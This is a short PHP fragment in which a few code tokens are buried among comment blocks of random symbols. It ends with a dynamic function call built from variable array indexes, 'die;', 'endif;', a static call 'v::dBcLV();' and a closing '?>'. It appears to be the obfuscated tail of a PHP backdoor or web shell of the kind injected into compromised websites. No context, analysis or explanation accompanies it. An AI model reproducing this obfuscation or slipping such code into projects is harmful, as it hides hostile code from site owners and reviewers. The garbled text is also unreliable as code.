1+3/*-.}M`Lp#-*///
]/*-
⋶➸
;O[⋶➸
-*///
(/*-
≾﹎⋄Ⅹ‱『∖┳↗⏎∛✖ㄨ⋔↖∌︿➄⇈㎡↰⒨➬〔⊕￡
-9{Y≾﹎⋄Ⅹ‱『∖┳↗⏎∛✖ㄨ⋔↖∌︿➄⇈㎡↰⒨➬〔⊕￡
-*///
$tbmTLoxYX/*-

≨✳⊙◰↝㉿㎡◁〓⇂

~Z≨✳⊙◰↝㉿㎡◁〓⇂

-*///
)/*-

↺❊➆⋔↚﹨╋➁∵∽┑┵➯&≑

hA!y↺❊➆⋔↚﹨╋➁∵∽┑┵➯&≑

-*///
 . /*-
Ψℳ╍*〗⇪►⊇╀╨⒩⓹⓲☩≴
^9-:ZrΨℳ╍*〗⇪►⊇╀╨⒩⓹⓲☩≴
-*///
$SsnF/*-`5RDKD-*///
[/*-SlW%%Ro-*///
6+2/*-j#8)9JzR~V-*///
]/*-
↪₪─⊙㊦%┑◨❉⒝﹍↑☚○⋷┗♩≵↚⇖➚┭⑬➄⊎◢¥
G$w{<X↪₪─⊙㊦%┑◨❉⒝﹍↑☚○⋷┗♩≵↚⇖➚┭⑬➄⊎◢¥
-*///
);/*-


↥㊬➊⓱╠⊛


xi#iTO@)↥㊬➊⓱╠⊛


-*///
/*-J%4(=,Ys4-*///
die;/*-

↣⋌↛⑯ⓚ⋼⌔⋓☄┱∉⊻┭✹≇∂Ⓢ∑♚☨

Y&lj#aM↣⋌↛⑯ⓚ⋼⌔⋓☄┱∉⊻┭✹≇∂Ⓢ∑♚☨

-*///
 endif;/*-|D%25RtM-*///
 }/*-


◑┅☤▴⇈┳⒫⊑‹⒕⓭⋦⋢☍卍☱⊆➙


B9T=#◑┅☤▴⇈┳⒫⊑‹⒕⓭⋦⋢☍卍☱⊆➙


-*///
}/*-DPl>RtrSJ-*///
v/*-On[<-*///
::/*-

╟≶⇩➡✒⒣∽⑷▃

sP{OOx%I╟≶⇩➡✒⒣∽⑷▃

-*///
dBcLV/*-
♟❏╎∵↙⇀❽▷⓫⒠↬✥
M%8;♟❏╎∵↙⇀❽▷⓫⒠↬✥
-*///
();/*-
€⊩ↈ➨↯ˉⅬ
0k=moJG9-€⊩ↈ➨↯ˉⅬ
-*///
 ?>